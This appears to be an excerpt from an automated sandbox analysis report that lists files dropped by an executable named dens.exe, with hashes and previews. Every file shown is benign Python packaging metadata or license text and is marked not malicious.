                                                                                                                                                                                                                                            Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2020
                                                                                                                                                                                                                                            Entropy (8bit):5.0469065437932175
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:DfdqaaC3P1xe9okGw1w8wQwywbM0kvsJib0ts++kv0gMzvy0htC+heU01:DfdqaaC/12G2bHZokO+/36
                                                                                                                                                                                                                                            MD5:18B352E2051962B9F65C33BC651426BF
                                                                                                                                                                                                                                            SHA1:3DD8D93CF7695D1C9D7574751AB5B0DEE5DD7F9A
                                                                                                                                                                                                                                            SHA-256:8215C54EAD77D9DC5A108A25C6BDC72B5999AA6F62C9499A440359412AFA5A51
                                                                                                                                                                                                                                            SHA-512:D966BC2899079C0D9AC763C96EA59A550E00A54BDCEEB6D96B0A8CAA9F6A1C408E7E3946915432978EDE9EDF669EEC68035A55B094B69671A28428458760D99E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: backports.tarfile.Version: 1.2.0.Summary: Backport of CPython tarfile module.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Homepage, https://github.com/jaraco/backports.tarfile.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Provides-Extra: docs.Requires-Dist: sphinx >=3.5 ; extra == 'docs'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'docs'.Requires-Dist: rst.linker >=1.9 ; extra == 'docs'.Requires-Dist: furo ; extra == 'docs'.Requires-Dist: sphinx-lint ; extra == 'docs'.Provides-Extra: testing.Requires-Dist: pytest !=8.1.*,>=6 ; extra == 'testing'.Requires-Dist: pytest-checkdocs >=2.4 ; extra == 'testing'.Requires-Dist: pytest-cov ; extra == 'testing
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1360
                                                                                                                                                                                                                                            Entropy (8bit):5.753738299642538
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:U6rn/2zDJ6rvbqfuG6rJnB6rU6rEsJYB6rXamx6rlCHmTKjaQliwxJlp5DQljQls:NnuXIzUurJwN5JjfAlqYK9liSlp5DQlP
                                                                                                                                                                                                                                            MD5:CF347AE8E31132435B127226F358F8CD
                                                                                                                                                                                                                                            SHA1:2C857B300638FF291651234BBB2C077BEEF494E4
                                                                                                                                                                                                                                            SHA-256:258A1F1C849E1175069A55A5D6CE357AFDD04E34CD5DE27093E4ACEC7A9D2CE1
                                                                                                                                                                                                                                            SHA-512:2A46C7FDFA2F9883BB1D761646B33BE9CE7B07280A5BF38992C1C84AB0449944EB0CAF34620CCC82DDBBC193F0D54AE67797D97863F70CA0C24EE55A3B401F9C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:backports.tarfile-1.2.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..backports.tarfile-1.2.0.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..backports.tarfile-1.2.0.dist-info/METADATA,sha256=ghXFTq132dxaEIolxr3HK1mZqm9iyUmaRANZQSr6WlE,2020..backports.tarfile-1.2.0.dist-info/RECORD,,..backports.tarfile-1.2.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..backports.tarfile-1.2.0.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..backports.tarfile-1.2.0.dist-info/top_level.txt,sha256=cGjaLMOoBR1FK0ApojtzWVmViTtJ7JGIK_HwXiEsvtU,10..backports/__init__.py,sha256=iOEMwnlORWezdO8-2vxBIPSR37D7JGjluZ8f55vzxls,81..backports/__pycache__/__init__.cpython-312.pyc,,..backports/tarfile/__init__.py,sha256=Pwf2qUIfB0SolJPCKcx3vz3UEu_aids4g4sAfxy94qg,108491..backports/tarfile/__main__.py,sha256=Yw2oGT1afrz2eBskzdPYL8ReB_3liApmhFkN2EbDmc4,59..backports/tarfile/__pycache__/__init__.cpython-312.pyc,,..back
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                                                                                            Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                                            MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                                            SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                                            SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                                            SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10
                                                                                                                                                                                                                                            Entropy (8bit):3.321928094887362
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:21v:ev
                                                                                                                                                                                                                                            MD5:9BA458821AD258B6EF62B47E91302982
                                                                                                                                                                                                                                            SHA1:9EDB9E6BA5C4001CE2FCCF328739292404EA9604
                                                                                                                                                                                                                                            SHA-256:7068DA2CC3A8051D452B4029A23B73595995893B49EC91882BF1F05E212CBED5
                                                                                                                                                                                                                                            SHA-512:3A296E5DADD5B406330BA088BFED33BE6960F8FF42DB6651E185FF14F2272FC819EF520D1A15BC40DA4E20B9CA0E5D79170EDF33F3D50937C7FBEDB338CAC730
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:backports.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11358
                                                                                                                                                                                                                                            Entropy (8bit):4.4267168336581415
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:nU6G5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEn7HbHR:U9vlKM1zJlFvmNz5VrlkTS07Ht
                                                                                                                                                                                                                                            MD5:3B83EF96387F14655FC854DDC3C6BD57
                                                                                                                                                                                                                                            SHA1:2B8B815229AA8A61E483FB4BA0588B8B6C491890
                                                                                                                                                                                                                                            SHA-256:CFC7749B96F63BD31C3C42B5C471BF756814053E847C10F3EB003417BC523D30
                                                                                                                                                                                                                                            SHA-512:98F6B79B778F7B0A15415BD750C3A8A097D650511CB4EC8115188E115C47053FE700F578895C097051C9BC3DFB6197C2B13A15DE203273E1A3218884F86E90E8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4648
                                                                                                                                                                                                                                            Entropy (8bit):5.006900644756252
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:Dx2ZSaCSmS8R902Vpnu386eLQ9Ac+fFZpDN00x2jZ2SBXZJSwTE:9Smzf02Vpnu386mQ9B+TP0vJHJSwTE
                                                                                                                                                                                                                                            MD5:98ABEAACC0E0E4FC385DFF67B607071A
                                                                                                                                                                                                                                            SHA1:E8C830D8B0942300C7C87B3B8FD15EA1396E07BD
                                                                                                                                                                                                                                            SHA-256:6A7B90EFFEE1E09D5B484CDF7232016A43E2D9CC9543BCBB8E494B1EC05E1F59
                                                                                                                                                                                                                                            SHA-512:F1D59046FFA5B0083A5259CEB03219CCDB8CC6AAC6247250CBD83E70F080784391FCC303F7630E1AD40E5CCF5041A57CB9B68ADEFEC1EBC6C31FCF7FFC65E9B7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: importlib_metadata.Version: 8.0.0.Summary: Read metadata from Python packages.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Source, https://github.com/python/importlib_metadata.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: zipp >=0.5.Requires-Dist: typing-extensions >=3.6.4 ; python_version < "3.8".Provides-Extra: doc.Requires-Dist: sphinx >=3.5 ; extra == 'doc'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'doc'.Requires-Dist: rst.linker >=1.9 ; extra == 'doc'.Requires-Dist: furo ; extra == 'doc'.Requires-Dist: sphinx-lint ; extra == 'doc'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'doc'.Provides-Extra: perf.Requires-D
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2518
                                                                                                                                                                                                                                            Entropy (8bit):5.6307766747793275
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:UnuXTg06U5J/Vw9l/gfNX7/XzBk9pvJq/fwJOfYrBfnJ/V0XJnzN/3WJV:bXzP/EgdzzBkDJsoIYrBfJ/CXNz9qV
                                                                                                                                                                                                                                            MD5:EB513CAFA5226DDA7D54AFDCC9AD8A74
                                                                                                                                                                                                                                            SHA1:B394C7AEC158350BAF676AE3197BEF4D7158B31C
                                                                                                                                                                                                                                            SHA-256:0D8D3C6EEB9EBBE86CAC7D60861552433C329DA9EA51248B61D02BE2E5E64030
                                                                                                                                                                                                                                            SHA-512:A0017CFAFF47FDA6067E3C31775FACEE4728C3220C2D4BD70DEF328BD20AA71A343E39DA15CD6B406F62311894C518DFCF5C8A4AE6F853946F26A4B4E767924E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:importlib_metadata-8.0.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..importlib_metadata-8.0.0.dist-info/LICENSE,sha256=z8d0m5b2O9McPEK1xHG_dWgUBT6EfBDz6wA0F7xSPTA,11358..importlib_metadata-8.0.0.dist-info/METADATA,sha256=anuQ7_7h4J1bSEzfcjIBakPi2cyVQ7y7jklLHsBeH1k,4648..importlib_metadata-8.0.0.dist-info/RECORD,,..importlib_metadata-8.0.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..importlib_metadata-8.0.0.dist-info/WHEEL,sha256=mguMlWGMX-VHnMpKOjjQidIo1ssRlCFu4a4mBpz1s2M,91..importlib_metadata-8.0.0.dist-info/top_level.txt,sha256=CO3fD9yylANiXkrMo4qHLV_mqXL2sC5JFKgt1yWAT-A,19..importlib_metadata/__init__.py,sha256=tZNB-23h8Bixi9uCrQqj9Yf0aeC--Josdy3IZRIQeB0,33798..importlib_metadata/__pycache__/__init__.cpython-312.pyc,,..importlib_metadata/__pycache__/_adapters.cpython-312.pyc,,..importlib_metadata/__pycache__/_collections.cpython-312.pyc,,..importlib_metadata/__pycache__/_compat.cpython-312.pyc,,..importlib_metadata/__pycac
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):91
                                                                                                                                                                                                                                            Entropy (8bit):4.687870576189661
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeXMRYFAVLMvhRRP+tPCCfA5S:RtC1VLMvhjWBBf
                                                                                                                                                                                                                                            MD5:7D09837492494019EA51F4E97823D79F
                                                                                                                                                                                                                                            SHA1:7829B4324BB542799494131A270EC3BDAD4DEDEF
                                                                                                                                                                                                                                            SHA-256:9A0B8C95618C5FE5479CCA4A3A38D089D228D6CB1194216EE1AE26069CF5B363
                                                                                                                                                                                                                                            SHA-512:A0063220ECDD22C3E735ACFF6DE559ACF3AC4C37B81D37633975A22A28B026F1935CD1957C0FF7D2ECC8B7F83F250310795EECC5273B893FFAB115098F7B9C38
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: setuptools (70.1.1).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):19
                                                                                                                                                                                                                                            Entropy (8bit):3.536886723742169
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:JSej0EBERG:50o4G
                                                                                                                                                                                                                                            MD5:A24465F7850BA59507BF86D89165525C
                                                                                                                                                                                                                                            SHA1:4E61F9264DE74783B5924249BCFE1B06F178B9AD
                                                                                                                                                                                                                                            SHA-256:08EDDF0FDCB29403625E4ACCA38A872D5FE6A972F6B02E4914A82DD725804FE0
                                                                                                                                                                                                                                            SHA-512:ECF1F6B777970F5257BDDD353305447083008CEBD8E5A27C3D1DA9C7BDC3F9BF3ABD6881265906D6D5E11992653185C04A522F4DB5655FF75EEDB766F93D5D48
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:importlib_metadata.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11358
                                                                                                                                                                                                                                            Entropy (8bit):4.4267168336581415
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:nU6G5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEn7HbHR:U9vlKM1zJlFvmNz5VrlkTS07Ht
                                                                                                                                                                                                                                            MD5:3B83EF96387F14655FC854DDC3C6BD57
                                                                                                                                                                                                                                            SHA1:2B8B815229AA8A61E483FB4BA0588B8B6C491890
                                                                                                                                                                                                                                            SHA-256:CFC7749B96F63BD31C3C42B5C471BF756814053E847C10F3EB003417BC523D30
                                                                                                                                                                                                                                            SHA-512:98F6B79B778F7B0A15415BD750C3A8A097D650511CB4EC8115188E115C47053FE700F578895C097051C9BC3DFB6197C2B13A15DE203273E1A3218884F86E90E8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3944
                                                                                                                                                                                                                                            Entropy (8bit):5.015824473130961
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:DHxQuiTaCP1nTGDbHRbnzQWHaiQq+fT5lWp8sSwTW:2PP9GDbHRbnp+rapPSwTW
                                                                                                                                                                                                                                            MD5:C3EB48CD13B50DDED7CD524E1E9DD4CE
                                                                                                                                                                                                                                            SHA1:7C9B0B50D0E667825DAB09902AD8376A5F2945B6
                                                                                                                                                                                                                                            SHA-256:83878CD8BB8BD0E89971454D0F4AB00C9529136F603AFB4EDC148F5D36CEF459
                                                                                                                                                                                                                                            SHA-512:056EBC250B7E82F91B5C5E96B1293F24D5E917E06846A9716A4D05B47C30FEB3781E439C77876CF7D8620BEBAA4A253039CA8DF122283DE304992E340F4DE8BF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: importlib_resources.Version: 6.4.0.Summary: Read resources from Python packages.Home-page: https://github.com/python/importlib_resources.Author: Barry Warsaw.Author-email: barry@python.org.Project-URL: Documentation, https://importlib-resources.readthedocs.io/.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.License-File: LICENSE.Requires-Dist: zipp >=3.1.0 ; python_version < "3.10".Provides-Extra: docs.Requires-Dist: sphinx >=3.5 ; extra == 'docs'.Requires-Dist: sphinx <7.2.5 ; extra == 'docs'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'docs'.Requires-Dist: rst.linker >=1.9 ; extra == 'docs'.Requires-Dist: furo ; extra == 'docs'.Requires-Dist: sphinx-lint ; extra == 'docs'.Requires-Dist: jaraco.tidelift >=1.4 ; ext
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7620
                                                                                                                                                                                                                                            Entropy (8bit):5.560551717923108
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:lX7qdX7ZgsP7JtILSVAn5V26+XuVYmBXx:lX7wX7ZBP7ELSVAni6+iBh
                                                                                                                                                                                                                                            MD5:67F5E26385B6BDCF2236A005A2D2BA32
                                                                                                                                                                                                                                            SHA1:3DCD8685638A90D121FD484138AFCAC9775E5D66
                                                                                                                                                                                                                                            SHA-256:967DD56FEEA143F1D2C4E98AC1F937C055E61C9AA0425146D55F7AD7C82510FA
                                                                                                                                                                                                                                            SHA-512:30B5812E930A00A476E570EBCC4611D54C911A8B1E4646949A887F551FC5ABDC933311A554B197C602F0DA7626DFE8877A3F267EFBC6D724E24A3E9B5FCC2E30
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:importlib_resources-6.4.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..importlib_resources-6.4.0.dist-info/LICENSE,sha256=z8d0m5b2O9McPEK1xHG_dWgUBT6EfBDz6wA0F7xSPTA,11358..importlib_resources-6.4.0.dist-info/METADATA,sha256=g4eM2LuL0OiZcUVND0qwDJUpE29gOvtO3BSPXTbO9Fk,3944..importlib_resources-6.4.0.dist-info/RECORD,,..importlib_resources-6.4.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..importlib_resources-6.4.0.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..importlib_resources-6.4.0.dist-info/top_level.txt,sha256=fHIjHU1GZwAjvcydpmUnUrTnbvdiWjG4OEVZK8by0TQ,20..importlib_resources/__init__.py,sha256=uyp1kzYR6SawQBsqlyaXXfIxJx4Z2mM8MjmZn8qq2Gk,505..importlib_resources/__pycache__/__init__.cpython-312.pyc,,..importlib_resources/__pycache__/_adapters.cpython-312.pyc,,..importlib_resources/__pycache__/_common.cpython-312.pyc,,..importlib_resources/__pycache__/_itertools.cpython-312.pyc,,..importlib_resource
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                                                                                            Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                                            MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                                            SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                                            SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                                            SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):20
                                                                                                                                                                                                                                            Entropy (8bit):3.6841837197791887
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:JSe8AW6D:3fD
                                                                                                                                                                                                                                            MD5:0613840F692BD9E064FEDD915DFD477A
                                                                                                                                                                                                                                            SHA1:64DF38B36F541BA1714C15FCA1A9CA8C94EF2DAA
                                                                                                                                                                                                                                            SHA-256:7C72231D4D46670023BDCC9DA6652752B4E76EF7625A31B83845592BC6F2D134
                                                                                                                                                                                                                                            SHA-512:78AA888C24B3468C94FCB8EB882561D4B6F19A0537A4CFDDDFF94ED8A4BAFE8DF0C2B620E70B57A61E8BA3F877856DB9ADA548DFCA8CAE86D4C3C525A4E9B7EB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:importlib_resources.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1023
                                                                                                                                                                                                                                            Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                                            MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                                            SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                                            SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                                            SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                                            Malicious:false
